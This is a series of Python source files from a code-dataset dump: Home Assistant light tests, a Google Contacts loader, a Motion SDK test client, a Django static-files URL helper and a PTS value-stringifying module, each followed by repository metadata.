self.assertEqual({}, data)
_, data = dev2.last_call('turn_on')
self.assertEqual({}, data)
_, data = dev3.last_call('turn_on')
self.assertEqual({}, data)
# faulty attributes will not trigger a service call
light.turn_on(
self.hass, dev1.entity_id,
profile=prof_name, brightness='bright')
light.turn_on(
self.hass, dev1.entity_id,
rgb_color='yellowish')
light.turn_on(
self.hass, dev2.entity_id,
white_value='high')
self.hass.block_till_done()
_, data = dev1.last_call('turn_on')
self.assertEqual({}, data)
_, data = dev2.last_call('turn_on')
self.assertEqual({}, data)
def test_broken_light_profiles(self):
"""Test light profiles."""
platform = loader.get_component(self.hass, 'light.test')
platform.init()
user_light_file = self.hass.config.path(light.LIGHT_PROFILES_FILE)
# Setup a wrong light file
with open(user_light_file, 'w') as user_file:
user_file.write('id,x,y,brightness\n')
user_file.write('I,WILL,NOT,WORK\n')
self.assertFalse(setup_component(
self.hass, light.DOMAIN, {light.DOMAIN: {CONF_PLATFORM: 'test'}}))
def test_light_profiles(self):
"""Test light profiles."""
platform = loader.get_component(self.hass, 'light.test')
platform.init()
user_light_file = self.hass.config.path(light.LIGHT_PROFILES_FILE)
with open(user_light_file, 'w') as user_file:
user_file.write('id,x,y,brightness\n')
user_file.write('test,.4,.6,100\n')
self.assertTrue(setup_component(
self.hass, light.DOMAIN, {light.DOMAIN: {CONF_PLATFORM: 'test'}}
))
dev1, _, _ = platform.DEVICES
light.turn_on(self.hass, dev1.entity_id, profile='test')
self.hass.block_till_done()
_, data = dev1.last_call('turn_on')
self.assertEqual({
light.ATTR_HS_COLOR: (71.059, 100),
light.ATTR_BRIGHTNESS: 100
}, data)
def test_default_profiles_group(self):
"""Test default turn-on light profile for all lights."""
platform = loader.get_component(self.hass, 'light.test')
platform.init()
user_light_file = self.hass.config.path(light.LIGHT_PROFILES_FILE)
real_isfile = os.path.isfile
real_open = open
def _mock_isfile(path):
if path == user_light_file:
return True
return real_isfile(path)
def _mock_open(path):
if path == user_light_file:
return StringIO(profile_data)
return real_open(path)
profile_data = "id,x,y,brightness\n" +\
"group.all_lights.default,.4,.6,99\n"
with mock.patch('os.path.isfile', side_effect=_mock_isfile):
with mock.patch('builtins.open', side_effect=_mock_open):
with mock_storage():
self.assertTrue(setup_component(
self.hass, light.DOMAIN,
{light.DOMAIN: {CONF_PLATFORM: 'test'}}
))
dev, _, _ = platform.DEVICES
light.turn_on(self.hass, dev.entity_id)
self.hass.block_till_done()
_, data = dev.last_call('turn_on')
self.assertEqual({
light.ATTR_HS_COLOR: (71.059, 100),
light.ATTR_BRIGHTNESS: 99
}, data)
def test_default_profiles_light(self):
"""Test default turn-on light profile for a specific light."""
platform = loader.get_component(self.hass, 'light.test')
platform.init()
user_light_file = self.hass.config.path(light.LIGHT_PROFILES_FILE)
real_isfile = os.path.isfile
real_open = open
def _mock_isfile(path):
if path == user_light_file:
return True
return real_isfile(path)
def _mock_open(path):
if path == user_light_file:
return StringIO(profile_data)
return real_open(path)
profile_data = "id,x,y,brightness\n" +\
"group.all_lights.default,.3,.5,200\n" +\
"light.ceiling_2.default,.6,.6,100\n"
with mock.patch('os.path.isfile', side_effect=_mock_isfile):
with mock.patch('builtins.open', side_effect=_mock_open):
with mock_storage():
self.assertTrue(setup_component(
self.hass, light.DOMAIN,
{light.DOMAIN: {CONF_PLATFORM: 'test'}}
))
dev = next(filter(lambda x: x.entity_id == 'light.ceiling_2',
platform.DEVICES))
light.turn_on(self.hass, dev.entity_id)
self.hass.block_till_done()
_, data = dev.last_call('turn_on')
self.assertEqual({
light.ATTR_HS_COLOR: (50.353, 100),
light.ATTR_BRIGHTNESS: 100
}, data)
async def test_intent_set_color(hass):
"""Test the set color intent."""
hass.states.async_set('light.hello_2', 'off', {
ATTR_SUPPORTED_FEATURES: light.SUPPORT_COLOR
})
hass.states.async_set('switch.hello', 'off')
calls = async_mock_service(hass, light.DOMAIN, light.SERVICE_TURN_ON)
hass.helpers.intent.async_register(light.SetIntentHandler())
result = await hass.helpers.intent.async_handle(
'test', light.INTENT_SET, {
'name': {
'value': 'Hello',
},
'color': {
'value': 'blue'
}
})
await hass.async_block_till_done()
assert result.speech['plain']['speech'] == \
'Changed hello 2 to the color blue'
assert len(calls) == 1
call = calls[0]
assert call.domain == light.DOMAIN
assert call.service == SERVICE_TURN_ON
assert call.data.get(ATTR_ENTITY_ID) == 'light.hello_2'
assert call.data.get(light.ATTR_RGB_COLOR) == (0, 0, 255)
async def test_intent_set_color_tests_feature(hass):
"""Test the set color intent."""
hass.states.async_set('light.hello', 'off')
calls = async_mock_service(hass, light.DOMAIN, light.SERVICE_TURN_ON)
hass.helpers.intent.async_register(light.SetIntentHandler())
try:
await hass.helpers.intent.async_handle(
'test', light.INTENT_SET, {
'name': {
'value': 'Hello',
},
'color': {
'value': 'blue'
}
})
assert False, 'handling intent should have raised'
except IntentHandleError as err:
assert str(err) == 'Entity hello does not support changing colors'
assert len(calls) == 0
async def test_intent_set_color_and_brightness(hass):
"""Test the set color intent."""
hass.states.async_set('light.hello_2', 'off', {
ATTR_SUPPORTED_FEATURES: (
light.SUPPORT_COLOR | light.SUPPORT_BRIGHTNESS)
})
hass.states.async_set('switch.hello', 'off')
calls = async_mock_service(hass, light.DOMAIN, light.SERVICE_TURN_ON)
hass.helpers.intent.async_register(light.SetIntentHandler())
result = await hass.helpers.intent.async_handle(
'test', light.INTENT_SET, {
'name': {
'value': 'Hello',
},
'color': {
'value': 'blue'
},
'brightness': {
'value': '20'
}
})
await hass.async_block_till_done()
assert result.speech['plain']['speech'] == \
'Changed hello 2 to the color blue and 20% brightness'
assert len(calls) == 1
call = calls[0]
assert call.domain == light.DOMAIN
assert call.service == SERVICE_TURN_ON
assert call.data.get(ATTR_ENTITY_ID) == 'light.hello_2'
assert call.data.get(light.ATTR_RGB_COLOR) == (0, 0, 255)
assert call.data.get(light.ATTR_BRIGHTNESS_PCT) == 20
async def test_light_context(hass):
"""Test that light context works."""
assert await async_setup_component(hass, 'light', {
'light': {
'platform': 'test'
}
})
state = hass.states.get('light.ceiling')
assert state is not None
await hass.services.async_call('light', 'toggle', {
'entity_id': state.entity_id,
}, True, core.Context(user_id='abcd'))
state2 = hass.states.get('light.ceiling')
assert state2 is not None
assert state.state != state2.state
assert state2.context.user_id == 'abcd'
| apache-2.0 | 7,891,534,767,537,181,000 | 33.198 | 79 | 0.585765 | false |
jakublipinski/i2Gmail-Backup-macOS-Messages-To-Gmail | contacts.py | 1 | 2674 | import gdata.data
import gdata.contacts.client
import gdata.contacts.data
import string
import config
class Contacts:
def __init__(self, credentials):
auth2token = gdata.gauth.OAuth2Token(client_id=credentials.client_id,
client_secret=credentials.client_secret,
scope='https://www.google.com/m8/feeds/contacts/default/full',
access_token=credentials.id_token,
refresh_token=credentials.refresh_token,
user_agent=config.APPLICATION_NAME)
self.client = gdata.contacts.client.ContactsClient()
auth2token.authorize(self.client)
self.email_to_name = {}
self.phone_to_name = {}
def load_contacts(self):
max_results = 99999
start_index = 1
query = gdata.contacts.client.ContactsQuery()
query.max_results = max_results
query.start_index = start_index
feed = self.client.GetContacts(q=query)
while feed:
for i, entry in enumerate(feed.entry):
if entry.name:
full_name = entry.name.full_name.text
primary_email = None
for email_entry in entry.email:
email = email_entry.address.lower()
if email_entry.primary and email_entry.primary=="true":
primary_email = email
if email in self.email_to_name:
print(u"Email address: '{}' is assigned to both '{}' and '{}'!".\
format(email, self.email_to_name[email], full_name))
else:
self.email_to_name[email] = (full_name, u'%s <%s>' % (full_name, email))
for phone_number_entry in entry.phone_number:
phone_number = Contacts.strip_and_reverse_phone_number(phone_number_entry.text)
if phone_number in self.phone_to_name:
print("Phone number: '%s' is assigned to both '%s' and '%s'!"%
(phone_number_entry.text, self.phone_to_name[phone_number], full_name))
else:
if primary_email:
self.phone_to_name[phone_number] = (
full_name, u'%s <%s>' % (full_name, primary_email))
else:
self.phone_to_name[phone_number] = (full_name, u'%s <%s>' % (full_name, phone_number_entry.text))
next_link = feed.GetNextLink()
if next_link:
feed = self.client.GetContacts(uri=next_link.href)
else:
feed = None
def get_by_phone_number(self, phone_number):
phone_number = Contacts.strip_and_reverse_phone_number(phone_number)
return self.phone_to_name.get(phone_number)
def get_by_email(self, email):
email = email.lower()
return self.email_to_name.get(email)
@staticmethod
def strip_and_reverse_phone_number(phone_number):
number = ''.join(ch for ch in phone_number if ch.isdigit())
if len(number)<3:
return phone_number
number = number[-9:]
number = number[::-1]
return number
| mit | 2,101,036,142,555,594,800 | 32.012346 | 105 | 0.665669 | false |
bmswgnp/sdk | python/test.py | 1 | 5131 | #
# Simple test program for the Python Motion SDK.
#
# @file tools/sdk/python/test.py
# @author Luke Tokheim, [email protected]
# @version 2.2
#
# Copyright (c) 2015, Motion Workshop
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import sys
from MotionSDK import *
PortPreview = 32079
PortSensor = 32078
PortRaw = 32077
PortConfigurable = 32076
PortConsole = 32075
NSample = 10
def test_Client(host, port):
client = Client(host, port)
print "Connected to " + str(host) + ":" + str(port)
xml_string = "<?xml version=\"1.0\"?><configurable><preview><Gq/></preview><sensor><a/></sensor></configurable>"
if client.writeData(xml_string):
print "Sent active channel definition to Configurable service"
if client.waitForData():
sample_count = 0
while sample_count < NSample:
data = client.readData()
if None == data:
break
if PortPreview == port:
container = Format.Preview(data)
for key in container:
q = container[key].getQuaternion(False)
print "q(" + str(key) + ") = (" + str(q[0]) + ", " + str(q[1]) + "i, " + str(q[2]) + "j, " + str(q[3]) + "k)"
if PortSensor == port:
container = Format.Sensor(data)
for key in container:
a = container[key].getAccelerometer()
print "a(" + str(key) + ") = (" + str(a[0]) + ", " + str(a[1]) + ", " + str(a[2]) + ") g"
if PortRaw == port:
container = Format.Raw(data)
for key in container:
a = container[key].getAccelerometer()
print "a(" + str(key) + ") = (" + str(a[0]) + ", " + str(a[1]) + ", " + str(a[2]) + ")"
if PortConfigurable == port:
container = Format.Configurable(data)
for key in container:
line = "data(" + str(key) + ") = ("
for i in range(container[key].size()):
if i > 0:
line += ", "
line += str(container[key].value(i))
line += ")"
print line
sample_count += 1
def test_LuaConsole(host, port):
client = Client(host, port)
print("Connected to " + str(host) + ":" + str(port))
#
# General Lua scripting interface.
#
lua_chunk = \
"if not node.is_reading() then" \
" node.close()" \
" node.scan()" \
" node.start()" \
" end" \
" if node.is_reading() then" \
" print('Reading from ' .. node.num_reading() .. ' device(s)')" \
" else" \
" print('Failed to start reading')" \
" end"
print LuaConsole.SendChunk(client, lua_chunk, 5)
# Scripting language compatibility class. Translate
# Python calls into Lua calls and send them to the
# console service.
node = LuaConsole.Node(client)
print "node.is_reading() = " + str(node.is_reading())
def test_File():
filename = "../../test_data/sensor.bin";
print "reading take data file: \"" + filename + "\""
take_file = File(filename)
while True:
data = take_file.readData(9, True)
if None == data:
break
print Format.SensorElement(data).getAccelerometer()
def main(argv):
# Set the default host name parameter. The SDK is
# socket based so any networked Motion Service is
# available.
host = ""
if len(argv) > 1:
host = argv[1]
test_LuaConsole(host, PortConsole)
test_Client(host, PortPreview)
test_Client(host, PortSensor)
test_Client(host, PortRaw)
test_Client(host, PortConfigurable)
test_File()
if __name__ == "__main__":
sys.exit(main(sys.argv))
| bsd-2-clause | 1,064,305,266,750,681,900 | 31.474684 | 129 | 0.588384 | false |
bop/foundation | lib/python2.7/site-packages/staticfiles/urls.py | 1 | 1283 | import re
from django.conf import settings
from django.conf.urls.defaults import patterns, url
from django.core.exceptions import ImproperlyConfigured
urlpatterns = []
def static(prefix, view='django.views.static.serve', **kwargs):
"""
Helper function to return a URL pattern for serving files in debug mode.
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = patterns('',
# ... the rest of your URLconf goes here ...
) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
"""
# No-op if not in debug mode or an non-local prefix
if not settings.DEBUG or (prefix and '://' in prefix):
return []
elif not prefix:
raise ImproperlyConfigured("Empty static prefix not permitted")
return patterns('',
url(r'^%s(?P<path>.*)$' % re.escape(prefix.lstrip('/')), view, kwargs=kwargs),
)
def staticfiles_urlpatterns(prefix=None):
"""
Helper function to return a URL pattern for serving static files.
"""
if prefix is None:
prefix = settings.STATIC_URL
return static(prefix, view='staticfiles.views.serve')
# Only append if urlpatterns are empty
if settings.DEBUG and not urlpatterns:
urlpatterns += staticfiles_urlpatterns()
| gpl-2.0 | 5,661,768,768,317,236,000 | 31.075 | 86 | 0.686672 | false |
SKIRT/PTS | core/tools/stringify.py | 1 | 41185 | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.core.tools.stringify Provides useful functions for converting objects of various types to strings.
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import standard modules
import copy
import warnings
# Import the relevant PTS classes and modules
from . import types
from . import introspection
from . import sequences
from . import strings
from . import numbers
# -----------------------------------------------------------------
def tostr(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
# Get the 'scientific' flag
scientific = kwargs.get("scientific", None)
scientific_int = kwargs.pop("scientific_int", True) # also represent integers in scientific notation
# Set default number of decimal places
#decimal_places = kwargs.pop("decimal_places", None) # let it be done automatically in the str_from_... function
#print(str(value), "nd", decimal_places)
#ndigits = kwargs.pop("ndigits", None)
decimal_places = kwargs.get("decimal_places", None)
ndigits = kwargs.get("ndigits", None)
# Set scientific flag flexibly, if scientific flag was not passed explicitly
if scientific is None:
# Integer value
if (scientific_int and types.is_integer_type(value)) or (types.is_real_type(value) and numbers.is_integer(value)):
# Convert to be certain (if from float)
value = int(value)
#if -1e4 <= value <= 1e4: scientific = False
if -999 < value < 999:
scientific = False
if ndigits is None: decimal_places = 0
else: scientific = True
# No decimals for integers
#decimal_places = 0 YES: OF COURSE THERE MUST BE DECIMAL PLACES FOR SCIENTIFIC NOTATION
# Real value
elif types.is_real_type(value):
#if -1e4 <= value <= 1e4: scientific = False
if -999.99 < value < 999.99: scientific = False
else: scientific = True
# Quantity
elif introspection.lazy_isinstance(value, "Quantity", "astropy.units", return_false_if_fail=True):
if -999.99 < value.value < 999.99: scientific = False
else: scientific = True
elif introspection.lazy_isinstance(value, "QuantityRange", "pts.core.basics.range", return_false_if_fail=True):
if -999.99 < value.min.value and value.max.value < 999.99: scientific = False
else: scientific = True
elif introspection.lazy_isinstance(value, "RealRange", "pts.core.basics.range", return_false_if_fail=True):
if -999.99 < value.min and value.max < 999.99: scientific = False
else: scientific = True
elif introspection.lazy_isinstance(value, "IntegerRange", "pts.core.basics.range", return_false_if_fail=True):
if -999 < value.min and value.max < 999: scientific = False
else: scientific = True
# Other
else: scientific = False
#print("scien", scientific)
#print("dec", decimal_places)
#print("nd", ndigits)
# Set the options
kwargs["scientific"] = scientific
kwargs["decimal_places"] = decimal_places
kwargs["ndigits"] = ndigits
# Set scientific flag for integers
elif types.is_integer_type(value) or (types.is_real_type(value) and numbers.is_integer(value)):
if scientific:
# ONLY IF SCIENTIFIC_INT IS TRUE
if scientific_int:
# ONLY IF NECESSARY
if -999 < value < 999: scientific = False
else: scientific = True
# Don't apply 'scientific' to integers
else: scientific = False
# Set flag
kwargs["scientific"] = scientific
kwargs["ndigits"] = ndigits
# Stringify
return stringify(value, **kwargs)[1].strip()
# -----------------------------------------------------------------
def stringify(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
# List or derived from list
if isinstance(value, list): return stringify_list(value, **kwargs)
# Dictionary
if isinstance(value, dict): return stringify_dict(value, **kwargs)
# Array or derived from Array, but not quantity!
#elif isinstance(value, np.ndarray) and not isinstance(value, Quantity):
#elif introspection.try_importing_module("numpy", True) and (isinstance(value, np.ndarray) and not hasattr(value, "unit")):
# WE ALSO TEST IF THIS IS NOT A NUMPY INTEGER, FLOAT OR BOOLEAN (because they have a __array__ attribute)
elif types.is_array_like(value): return stringify_array(value, **kwargs)
# Column or masked masked column
elif types.is_astropy_column(value): return stringify_array(value, **kwargs)
# Tuple or derived from tuple
elif isinstance(value, tuple): return stringify_tuple(value, **kwargs)
# All other
#else: return stringify_not_list(value, scientific=scientific, decimal_places=decimal_places, fancy=fancy, ndigits=ndigits, unicode=unicode, **kwargs)
else: return stringify_not_list(value, **kwargs)
# -----------------------------------------------------------------
def get_parsing_type(value):
"""
This function ...
:param value:
:return:
"""
ptype, string = stringify(value)
return ptype
# -----------------------------------------------------------------
def can_get_item(value):
"""
This function ...
:param value:
:return:
"""
#print(value, type(value))
try:
length = len(value)
except TypeError: return False
if len(value) == 0: return True
else:
try:
item = value[0]
return True
except IndexError: return False
# -----------------------------------------------------------------
def get_strings(values, return_types=False, value_kwargs=None, add_quotes=False, quote_character="'"):
"""
This function ...
:param values:
:param return_types:
:param value_kwargs:
:param add_quotes:
:param quote_character:
:return:
"""
if value_kwargs is None: value_kwargs = {}
strings = []
ptype = None
ptypes = set()
# Loop over the values
for entry in values:
# parsetype, val = stringify_not_list(entry)
parsetype, val = stringify(entry, **value_kwargs)
# from ..basics.configuration import parent_type
# if add_quotes and parent_type(parsetype) == "string":
if add_quotes and types.is_string_type(entry): val = quote_character + val + quote_character
if ptype is None: ptype = parsetype
elif ptype != parsetype:
# raise ValueError("Nonuniform list")
ptype = "mixed"
# Add the parse type
ptypes.add(parsetype)
# Add the string
strings.append(val)
# Return the strings
if return_types: return strings, list(ptypes), ptype
else: return strings
# -----------------------------------------------------------------
def stringify_list(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
#print("kwargs", kwargs)
#if len(value) == 0: raise ValueError("Cannot stringify an empty list")
if len(value) == 0: return "list", ""
# If delimiter is passed for stringifying the values in the list
value_kwargs = copy.copy(kwargs)
if "value_delimiter" in value_kwargs: value_kwargs["delimiter"] = value_kwargs.pop("value_delimiter")
elif "delimiter" in value_kwargs: del value_kwargs["delimiter"]
# If delimiter is passed for stringifying the keys in the list
#key_kwargs = copy.copy(kwargs)
#if "key_delimiter" in key_kwargs: key_kwargs["delimiter"] = key_kwargs.pop("key_delimiter")
#elif "delimiter" in key_kwargs: del key_kwargs["delimiter"]
# If quotes have to be added
add_quotes = kwargs.pop("add_quotes", False)
quote_character = kwargs.pop("quote_character", "'")
# Get strings
strings, ptypes, ptype = get_strings(value, return_types=True, value_kwargs=value_kwargs, add_quotes=add_quotes, quote_character=quote_character)
from ..basics.configuration import parent_type
from ..basics.log import log
if len(ptypes) == 1: ptype = ptypes[0]
elif sequences.all_equal(ptypes): ptype = ptypes[0]
else:
# Investigate the different ptypes
parent_types = [parent_type(type_name) for type_name in ptypes]
# Check
for i in range(len(parent_types)):
if parent_types[i] is None: log.warning("Could not determine the parent type for '" + ptypes[i] + "'. All parent types: " + str(parent_types))
#print("Parent types:", parent_types)
if sequences.all_equal(parent_types) and parent_types[0] is not None: ptype = parent_types[0]
elif ptype == "mixed": log.warning("Could not determine a common type for '" + stringify(parent_types)[1] + "'")
# Get delimiter for list
delimiter = kwargs.pop("delimiter", ",")
# Return the type and the string
if ptype.endswith("list"):
top_delimiter = delimiter + " "
return ptype + "_list", top_delimiter.join(strings)
else: return ptype + "_list", delimiter.join(strings)
# -----------------------------------------------------------------
def represent_dict(value, **kwargs):
"""
Thisf unction ...
:param value:
:param kwargs:
:return:
"""
if len(value) == 0: return ""
# Only for stringifying the values
value_kwargs = copy.copy(kwargs)
# If delimiter is passed for stringifying the values in the list
if "value_delimiter" in value_kwargs: value_kwargs["delimiter"] = value_kwargs.pop("value_delimiter")
# Get identify symbol
identity_symbol = kwargs.pop("identity_symbol", ": ")
quote_key = kwargs.pop("quote_key", True)
quote_value = kwargs.pop("quote_value", True)
quote_character = kwargs.pop("quote_character", "'")
# Don't quote certain thingies
no_quote_keys = kwargs.pop("no_quote_keys", [])
no_quote_value_for_keys = kwargs.pop("no_quote_value_for_keys", [])
# Do quote certain thingies
quote_keys = kwargs.pop("quote_keys", [])
quote_value_for_keys = kwargs.pop("quote_value_for_keys", [])
replace_spaces_keys = kwargs.pop("replace_spaces_keys", None)
replace_spaces_values = kwargs.pop("replace_spaces_values", None)
replace_in_keys = kwargs.pop("replace_in_keys", None)
replace_in_values = kwargs.pop("replace_in_values", None)
parts = []
# Loop over the dictionary keys
for key in value:
# Stringify the key
ktype, kstring = stringify(key, **kwargs)
if replace_spaces_keys is not None: kstring = kstring.replace(" ", replace_spaces_keys)
if replace_in_keys is not None: kstring = strings.replace_from_dict(kstring, replace_in_keys)
v = value[key]
# Stringify the value
vtype, vstring = stringify(v, **value_kwargs)
if replace_spaces_values is not None: vstring = vstring.replace(" ", replace_spaces_values)
if replace_in_values is not None: vstring = strings.replace_from_dict(vstring, replace_in_values)
# Quote keys
if quote_key:
# Don't quote after all
if key in no_quote_keys: kstring_with_quotes = kstring
# Quote
else: kstring_with_quotes = quote_character + kstring + quote_character
# Don't quote keys
else:
# Quote after all
if key in quote_keys: kstring_with_quotes = quote_character + kstring + quote_character
# Don't quote
else: kstring_with_quotes = kstring
# DON't QUOTE THESE
if vtype == "integer" or vtype == "real" or vtype == "boolean": vstring_with_quotes = vstring
# Quote values
elif quote_value:
# Don't quote after all
if key in no_quote_value_for_keys: vstring_with_quotes = vstring
# Just quote
else: vstring_with_quotes = quote_character + vstring + quote_character
# Don't quote values
else:
# DO quote after all
if key in quote_value_for_keys: vstring_with_quotes = quote_character + vstring + quote_character
# Don't quote
else: vstring_with_quotes = vstring
# Determine line
string = kstring_with_quotes + identity_symbol + vstring_with_quotes
# Add line
parts.append(string)
# Get delimiter
delimiter = kwargs.pop("delimiter", ",")
# Return
return delimiter.join(parts)
# -----------------------------------------------------------------
def stringify_dict(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
#if len(value) == 0: raise ValueError("Cannot stringify an empty dictionary")
if len(value) == 0: return "dictionary", ""
keytype = None
ptype = None
parts = []
keytypes = set()
ptypes = set()
# Only for stringifying the values
value_kwargs = copy.copy(kwargs)
# If delimiter is passed for stringifying the values in the list
if "value_delimiter" in value_kwargs: value_kwargs["delimiter"] = value_kwargs.pop("value_delimiter")
# Get identify symbol
identity_symbol = kwargs.pop("identity_symbol", ": ")
quote_key = kwargs.pop("quote_key", True)
quote_value = kwargs.pop("quote_value", True)
quote_character = kwargs.pop("quote_character", "'")
# Don't quote certain thingies
no_quote_keys = kwargs.pop("no_quote_keys", [])
no_quote_value_for_keys = kwargs.pop("no_quote_value_for_keys", [])
# Do quote certain thingies
quote_keys = kwargs.pop("quote_keys", [])
quote_value_for_keys = kwargs.pop("quote_value_for_keys", [])
replace_spaces_keys = kwargs.pop("replace_spaces_keys", None)
replace_spaces_values = kwargs.pop("replace_spaces_values", None)
replace_in_keys = kwargs.pop("replace_in_keys", None)
replace_in_values = kwargs.pop("replace_in_values", None)
# Loop over the dictionary keys
for key in value:
# Stringify the key
ktype, kstring = stringify(key, **kwargs)
if replace_spaces_keys is not None: kstring = kstring.replace(" ", replace_spaces_keys)
if replace_in_keys is not None: kstring = strings.replace_from_dict(kstring, replace_in_keys)
# Add key type
keytypes.add(ktype)
# Check key type
if keytype is None: keytype = ktype
elif keytype != ktype: keytype = "mixed"
v = value[key]
# Stringify the value
vtype, vstring = stringify(v, **value_kwargs)
if replace_spaces_values is not None: vstring = vstring.replace(" ", replace_spaces_values)
if replace_in_values is not None: vstring = strings.replace_from_dict(vstring, replace_in_values)
# Add value type
ptypes.add(vtype)
# Check value type
if ptype is None: ptype = vtype
elif ptype != vtype: ptype = "mixed"
# if quote_key and key not in no_quote_keys: kstring_with_quotes = quote_character + kstring + quote_character
# else: kstring_with_quotes = kstring
# Quote keys
if quote_key:
# Don't quote after all
if key in no_quote_keys: kstring_with_quotes = kstring
# Quote
else: kstring_with_quotes = quote_character + kstring + quote_character
# Don't quote keys
else:
# Quote after all
if key in quote_keys: kstring_with_quotes = quote_character + kstring + quote_character
# Don't quote
else: kstring_with_quotes = kstring
#if ptype == "integer" or ptype == "real" or ptype == "boolean": vstring_with_quotes = vstring
#elif quote_value and key not in no_quote_value_for_keys: vstring_with_quotes = quote_character + vstring + quote_character
#else: vstring_with_quotes = vstring
# DON't QUOTE THESE
if ptype == "integer" or ptype == "real" or ptype == "boolean": vstring_with_quotes = vstring
# Quote values
elif quote_value:
# Don't quote after all
if key in no_quote_value_for_keys: vstring_with_quotes = vstring
# Just quote
else: vstring_with_quotes = quote_character + vstring + quote_character
# Don't quote values
else:
# DO quote after all
if key in quote_value_for_keys: vstring_with_quotes = quote_character + vstring + quote_character
# Don't quote
else: vstring_with_quotes = vstring
# Determine line
string = kstring_with_quotes + identity_symbol + vstring_with_quotes
# Add line
parts.append(string)
from ..basics.configuration import parent_type
from ..basics.log import log
keytypes = list(keytypes)
ptypes = list(ptypes)
# Investigate the different keytypes
parent_key_types = [parent_type(type_name) for type_name in keytypes]
#print("Parent key types:", parent_key_types)
# Check
for i in range(len(parent_key_types)):
if parent_key_types[i] is None: log.warning("Could not determine the parent type for '" + keytypes[i] + "'. All parent types: " + str(parent_key_types))
if sequences.all_equal(parent_key_types) and parent_key_types[0] is not None: ptype = parent_key_types[0]
elif keytype == "mixed": log.warning("Could not determine a common type for '" + stringify(parent_key_types)[1] + "'")
# Investigate the different value types
parent_value_types = [parent_type(type_name) for type_name in ptypes]
# Check
for i in range(len(parent_value_types)):
if parent_value_types[i] is None: log.warning("Could not determine the parent type for '" + ptypes[i] + "'. All parent types: " + str(parent_value_types))
#print("Parent value types:", parent_value_types)
if sequences.all_equal(parent_value_types) and parent_value_types[0] is not None: ptype = parent_value_types[0]
elif ptype == "mixed": log.warning("Could not determine a common type for '" + stringify(parent_value_types)[1] + "'")
# Get delimiter
delimiter = kwargs.pop("delimiter", ",")
# Return
return keytype + "_" + ptype + "_dictionary", delimiter.join(parts)
# -----------------------------------------------------------------
def stringify_array(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
# Get delimiter
delimiter = kwargs.pop("delimiter", ",")
ptype, val = stringify_not_list(value[0], **kwargs)
if ptype is None: return "array", delimiter.join([repr(el) for el in value])
else: return ptype + "_array", delimiter.join([repr(el) for el in value])
#ptype, val = stringify_not_list(value[0])
#return ptype + "_array", ",".join([repr(el) for el in value])
# -----------------------------------------------------------------
def stringify_tuple(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
value_kwargs = copy.copy(kwargs)
if "value_delimiter" in value_kwargs: value_kwargs["delimiter"] = value_kwargs.pop("value_delimiter")
#print("kwargs", kwargs)
strings = []
ptype = None
for entry in value:
#parsetype, val = stringify_not_list(entry, **kwargs)
parsetype, val = stringify(entry, **kwargs)
if ptype is None:
ptype = parsetype
elif ptype != parsetype:
#raise ValueError("Nonuniform tuple")
warnings.warn("Nonuniform tuple")
ptype = "mixed"
strings.append(val)
# Get delimiter
delimiter = kwargs.pop("delimiter", ",")
# Return
if ptype is not None: return ptype + "_tuple", delimiter.join(strings)
else: return "tuple", delimiter.join(strings)
# -----------------------------------------------------------------
def stringify_not_list(value, **kwargs):
"""
This function does stringify, but not for iterables
:param value:
:param kwargs:
:return:
"""
# Standard
if types.is_boolean_type(value): return "boolean", str_from_bool(value, **kwargs)
elif types.is_integer_type(value): return "integer", str_from_integer(value, **kwargs)
elif types.is_real_type(value): return "real", str_from_real(value, **kwargs)
elif types.is_string_type(value): return "string", value
elif types.is_none(value): return "None", kwargs.pop("none_string", "None")
# Unit, quantity, angle
elif introspection.lazy_isinstance(value, "UnitBase", "astropy.units"): return introspection.lazy_call("stringify_unit", "pts.core.units.stringify", value, **kwargs)
elif introspection.lazy_isinstance(value, "Quantity", "astropy.units"): return introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", value, **kwargs)
elif introspection.lazy_isinstance(value, "Angle", "astropy.coordinates"): return "angle", str_from_angle(value, **kwargs)
# Range
elif introspection.lazy_isinstance(value, "RealRange", "pts.core.basics.range"): return "real_range", str_from_real_range(value, **kwargs)
elif introspection.lazy_isinstance(value, "IntegerRange", "pts.core.basics.range"): return "integer_range", str_from_integer_range(value, **kwargs)
elif introspection.lazy_isinstance(value, "QuantityRange", "pts.core.basics.range"): return "quantity_range", introspection.lazy_call("str_from_quantity_range", "pts.core.units.stringify", value, **kwargs)
# Coordinates
